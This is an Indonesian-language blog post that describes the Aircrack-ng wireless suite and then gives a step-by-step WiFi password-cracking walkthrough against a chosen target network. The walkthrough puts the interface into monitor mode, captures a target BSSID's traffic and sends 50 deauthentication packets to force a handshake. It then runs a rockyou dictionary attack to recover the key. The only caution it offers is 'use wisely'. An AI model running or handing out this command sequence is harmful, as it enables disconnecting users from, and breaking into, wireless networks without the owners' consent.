Aircrack-ng adalah kumpulan aplikasi jaringan yang terdiri dari detector, packet sniffer, pemecah dan penganalisis WEP maupun WPA/WPA2 untuk jaringan WLAN 802.11. Aircrack bekerja pada wireless network interface yang mendukung monitoring mode dan bisa mendeteksi trafik dari 802.11a, 802.11b and 802.11g.
Fitur-Fitur Aircrack-ng :
Berikut ini adalah fitur yang tersedia pada paket AirCrack.
Name | Description |
---|---|
aircrack-ng | Cracks WEP and WPA (Dictionary attack) keys. |
airdecap-ng | Decrypts WEP or WPA encrypted capture files with known key. |
airmon-ng | Placing different cards in monitor mode. |
aireplay-ng | Packet injector (Linux, and Windows with CommView drivers). |
airodump-ng | Packet sniffer: Places air traffic into PCAP or IVS files and shows information about networks. |
airtun-ng | Virtual tunnel interface creator. |
packetforge-ng | Create encrypted packets for injection. |
ivstools | Tools to merge and convert. |
airbase-ng | Incorporates techniques for attacking client, as opposed to Access Points |
airdecloak-ng | removes WEP cloaking from pcap files |
airdriver-ng | Tools for managing wireless drivers |
airolib-ng | stores and manages ESSID and password lists and compute Pairwise Master Keys |
airserv-ng | allows you to access the wireless card from other computers. |
buddy-ng | the helper server for easside-ng, run on a remote computer |
easside-ng | a tool for communicating to an access point, without the WEP key |
tkiptun-ng | WPA/TKIP attack |
wesside-ng | automatic tool for recovering wep key. |
DI TRANSLATE SENDIRI YA !!! Wkwk...
Oke Kita lanjut Step By Stepnya...
STEP 1
#airmon-ng check kill
#airmon-ng start wlan0
selanjutnya
#airodump-ng --bssid [bssid_Target] -c [channel_target] -w /root/Desktop/Result.txt wlan0mon
Nah Sekarang Kita Sudah Mengunci Target Kita Dan Capture sudah tersedia di Desktop Kita
SETELAH ITU BERSABARLAH :D Wkwk...
Dan HASILNYA?
STEP 3
Tahap Selanjutnya Kita Aktifkan aireplay-ng
#aireplay-ng --deauth 50 -a [bssid] wlan0mon
STEP 4
Selanjutnya kita aktifkan AIRCRACK-NG untuk Cracking Wifi Router tsb.
#aircrack-ng /root/Desktop/Result-01.cap -w /root/Desktop/rockyou
SETELAH ITU BERSABARLAH :D Wkwk...
Dan HASILNYA?
Oke barangkali cukup disini yang bisa Codot Share :D Semoga bermanfaat dan gunakan dengan bijak...
OK Sekian Dari Saya MRX_001
*bila ingin di salin mohon sertakan sumber :) terimakasih
"KNOWLEDGE IS FREE"
"FOR"
"EVERYONE"
Thanks to all member Cyrus Cyber :)
comment 0 comments:
more_vert*Komentar Dengan Sopan !
*Jangan OOT ^_^
sentiment_satisfied Emoticon